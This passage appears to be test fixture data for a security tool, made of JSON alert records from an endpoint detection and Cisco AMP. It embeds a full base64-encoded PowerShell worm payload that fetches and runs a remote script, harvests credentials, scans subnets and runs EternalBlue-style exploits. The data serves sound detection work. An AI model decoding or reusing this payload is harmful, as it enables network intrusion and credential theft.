BsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALg
BkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIg
ApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcw
BzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWw
BdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACg
AgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJA
BTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E 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","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
